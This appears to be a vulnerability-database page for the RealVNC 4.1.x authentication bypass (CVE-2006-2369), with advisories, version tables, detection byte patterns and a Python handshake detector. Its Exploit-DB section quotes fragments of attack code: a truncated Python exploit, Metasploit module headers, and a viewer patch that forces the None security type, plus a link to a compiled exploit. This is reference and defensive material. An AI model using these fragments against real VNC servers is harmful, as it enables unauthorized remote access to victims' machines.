CVE-2006-2369
Published: 2006-05-15
Priority: P277 high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 91.52% (99.8th percentile)
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| any1 | neatvnc | < 0.8.1 | 0.8.1 |
| any1 | neatvnc | >= 0 < 0.8.0+dfsg-2 | 0.8.0+dfsg-2 |
| any1 | neatvnc | >= 0 < 0.8.0+dfsg-2 | 0.8.0+dfsg-2 |
| debian | libvncserver | < libvncserver 0.8.2-1 (bookworm) | libvncserver 0.8.2-1 (bookworm) |
| debian | neatvnc | < neatvnc 0.8.0+dfsg-2 (forky) | neatvnc 0.8.0+dfsg-2 (forky) |
| libvncserver | libvncserver | — | — |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| vnc | realvnc | — | — |
Detection & IOCs
- bytes: \x01\x01 (NULL auth type advertised to client)
- bytes: \x00\x00\x00\x00 (auth result success spoofed to client)
- bytes: \x01 (secTypeNone sent to server)
- Detect VNC servers advertising only NULL (secTypeNone = 0x01) authentication. In the RFB 3.8 security handshake the server sends a count byte followed by that many security-type bytes, so a server sending exactly the two-byte sequence 0x01 0x01 is offering only None auth, which is the bypass condition.
- Flag VNC handshakes where the RFB protocol version is exactly 'RFB 003.008' followed by a client selecting security type 0x01 (None); this is the vulnerable negotiation path for RealVNC 4.1.0/4.1.1.
- Monitor for a MitM proxy pattern on port 5900 where a client receives 0x01 0x01 (only None auth) but the upstream server originally offered multiple auth methods; this is indicative of the bypass proxy technique.
- Use the Metasploit auxiliary scanner module for VNC None-auth detection as a proactive sweep against exposed VNC services.
- The vulnerability affects only RealVNC versions 4.1.0 and 4.1.1; the exploit checks for the exact RFB 003.008 banner to confirm vulnerability before proceeding.
- CVE-2024-42458 in Neat VNC (neatvnc before 0.8.1) is a related but distinct issue. It also fails to properly validate the security type, so detection logic for improper security-type negotiation applies to both.
- The exploit operates as a transparent proxy (MitM) between a VNC client and server; detection must account for the attacker-controlled relay rather than a direct client-to-server connection.
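One way to implement the first three checks above over reassembled handshake bytes (an added example, not code from any of the sources this page aggregates). The function names, finding labels and sample byte strings are constructed for illustration, and it assumes each direction of the TCP stream has already been reassembled by the capture tooling.

```python
RFB_38 = b"RFB 003.008\n"   # banner of the affected negotiation path
SEC_NONE, SEC_VNC_AUTH = 1, 2

def offered_types(server_bytes):
    """Security types listed by the server (count byte + types), or None if unparseable."""
    if server_bytes[:12] != RFB_38 or len(server_bytes) < 13:
        return None
    count = server_bytes[12]
    types = list(server_bytes[13:13 + count])
    return types if len(types) == count else None

def analyze_handshake(server_bytes, client_bytes):
    """Findings for one session, given each direction's reassembled byte stream."""
    offered = offered_types(server_bytes)
    if offered is None or client_bytes[:12] != RFB_38 or len(client_bytes) < 13:
        return ["unparsed"]
    if not offered:
        return ["server-refused"]            # count 0: a failure reason follows
    findings, chosen = [], client_bytes[12]
    if offered == [SEC_NONE]:
        findings.append("only-none-offered")
    if chosen not in offered:
        findings.append("unoffered-type-selected:%d" % chosen)
        # In RFB 3.8 the reply to a None selection is the 4-byte SecurityResult.
        start = 13 + len(offered)
        if chosen == SEC_NONE and server_bytes[start:start + 4] == b"\x00" * 4:
            findings.append("server-accepted-unoffered-none")
    return findings

def relay_downgrade(upstream_server_bytes, client_facing_bytes):
    """True when the client was shown only None but the real server offered more."""
    up = offered_types(upstream_server_bytes)
    down = offered_types(client_facing_bytes)
    return bool(up) and up != [SEC_NONE] and down == [SEC_NONE]

# Constructed sample streams (not captured from a real host).
OFFERS_VNC_AUTH = RFB_38 + b"\x01\x02"                     # one type: VNC auth
BYPASS_SERVER = OFFERS_VNC_AUTH + b"\x00\x00\x00\x00"      # ...yet answers "OK"
PICKS_NONE = RFB_38 + b"\x01"
NORMAL_SERVER = OFFERS_VNC_AUTH + bytes(16) + b"\x00" * 4  # challenge, then result
NORMAL_CLIENT = RFB_38 + b"\x02" + bytes(16)
ONLY_NONE_SERVER = RFB_38 + b"\x01\x01" + b"\x00" * 4

if __name__ == "__main__":
    print(analyze_handshake(BYPASS_SERVER, PICKS_NONE))
    print(analyze_handshake(NORMAL_SERVER, NORMAL_CLIENT))
    print(relay_downgrade(OFFERS_VNC_AUTH, ONLY_NONE_SERVER))
```

The `server-accepted-unoffered-none` finding is the one that confirms an unpatched server; `unoffered-type-selected` on its own means the attempt was made but the server did not answer with a success result.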
CVSS provenance
nvd·v2.0·7.5 HIGH·AV:N/AC:L/Au:N/C:P/I:P/A:P
osv·7.5 HIGH
vendor_debian·7.5 HIGH
vendor_redhat·7.5 HIGH
OSV
CVE-2024-42458: server
osv·2024-08-02·CVSS 7.5
CVE-2024-42458 [HIGH] CVE-2024-42458: server
server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the security type, a related issue to CVE-2006-2369.
GHSA
GHSA-ghjj-rq7v-wjhm: auth
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-2450 [HIGH] GHSA-ghjj-rq7v-wjhm: auth
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
GHSA
GHSA-p5jc-gpgq-6vfg: RealVNC 4
ghsa_unreviewed·2022-05-01
CVE-2006-2369 [HIGH] CWE-287 GHSA-p5jc-gpgq-6vfg: RealVNC 4
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
OSV
CVE-2006-2450: auth
osv·2006-07-18·CVSS 7.5
CVE-2006-2450 [HIGH] CVE-2006-2450: auth
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
OSV
CVE-2006-2369: RealVNC 4
osv·2006-05-15·CVSS 7.5
CVE-2006-2369 [HIGH] CVE-2006-2369: RealVNC 4
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
Debian
CVE-2024-42458: neatvnc - server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the s...
vendor_debian·2024·CVSS 7.5
CVE-2024-42458 [HIGH] CVE-2024-42458: neatvnc - server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the s...
server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the security type, a related issue to CVE-2006-2369.
Scope: local
bookworm: open
forky: resolved (fixed in 0.8.0+dfsg-2)
sid: resolved (fixed in 0.8.0+dfsg-2)
trixie: resolved (fixed in 0.8.0+dfsg-2)
Debian
CVE-2006-2450: libvncserver - auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication vi...
vendor_debian·2006·CVSS 7.5
CVE-2006-2450 [HIGH] CVE-2006-2450: libvncserver - auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication vi...
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
Scope: local
bookworm: resolved (fixed in 0.8.2-1)
bullseye: resolved (fixed in 0.8.2-1)
forky: resolved (fixed in 0.8.2-1)
sid: resolved (fixed in 0.8.2-1)
trixie: resolved (fixed in 0.8.2-1)
Red Hat
CVE-2006-2450: auth
vendor_redhat·CVSS 7.5
CVE-2006-2450 [HIGH] CVE-2006-2450: auth
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
Statement: Not vulnerable. This issue does not affect the versions of LibVNCServer as distributed with Red Hat Enterprise Linux 2.1, 3, or 4.
Red Hat
CVE-2006-2369: RealVNC 4
vendor_redhat·CVSS 7.5
CVE-2006-2369 [HIGH] CVE-2006-2369: RealVNC 4
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
Statement: This issue only affected version 4.1.1 and not the versions distributed with Red Hat Enterprise Linux 2.1, 3, or 4.
No detection rules found.
Exploit-DB
RealVNC 4.1.0/4.1.1 - Authentication Bypass
exploitdb·2012-05-13·CVSS 7.5
CVE-2006-2369 [HIGH] RealVNC 4.1.0/4.1.1 - Authentication Bypass
RealVNC 4.1.0/4.1.1 - Authentication Bypass
---
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re

BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444

def pwn4ge(host, port):
    socket.setdefaulttimeout(5)
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((host, port))
    except socket.error, msg:
        print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
        sys.exit();
    else:
        hello
Exploit-DB
RealVNC - Authentication Bypass (Metasploit)
exploitdb·2011-08-26·CVSS 7.5
CVE-2006-2369 [HIGH] RealVNC - Authentication Bypass (Metasploit)
RealVNC - Authentication Bypass (Metasploit)
---
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealVNC Authentication Bypass',
'Description' => %q{
This module exploits an Authentication Bypass Vulnerability
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
the attacking machine. This option should be disabled for Pro
},
'Author' =>
[
'hdm', #origin
Exploit-DB
RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass
exploitdb·2006-05-16
CVE-2006-2369 RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass
RealVNC 4.1.0 writeU8(secType);
+
+ // [BL4CK] In response to the VNC Null Authentication
+ // force a secType to equal secTypeNone
+ // http://blacksecurity.org
+ secType = secTypeNone;
+ os->writeU8(secTypeNone);
os->flush();
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
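Review bot: the added `secType = secTypeNone;` overwrites the selected type unconditionally, and nothing in the visible lines checks that None was among the types the server listed, so the following `os->writeU8(secTypeNone);` sends a type the server may never have offered and the `vlog.debug` line will always report None. A viewer should only send a type taken from the server's list. Because a client can be modified like this, the server has to compare the received byte against the list it sent and fail the handshake on a mismatch.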
E-DB Note:
Compiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
Exploit-DB
RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)
exploitdb·2006-05-15
CVE-2006-2369 RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)
RealVNC 4.1.0 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore ' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Aut
Metasploit
VNC Authentication None Detection
metasploit
Detect VNC servers that support the "None" authentication method.
Metasploit
RealVNC NULL Authentication Mode Bypass
metasploit
This module exploits an Authentication bypass vulnerability in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server. The AUTOVNC option requires that vncviewer be installed on the attacking machine.
2006-05-15
Published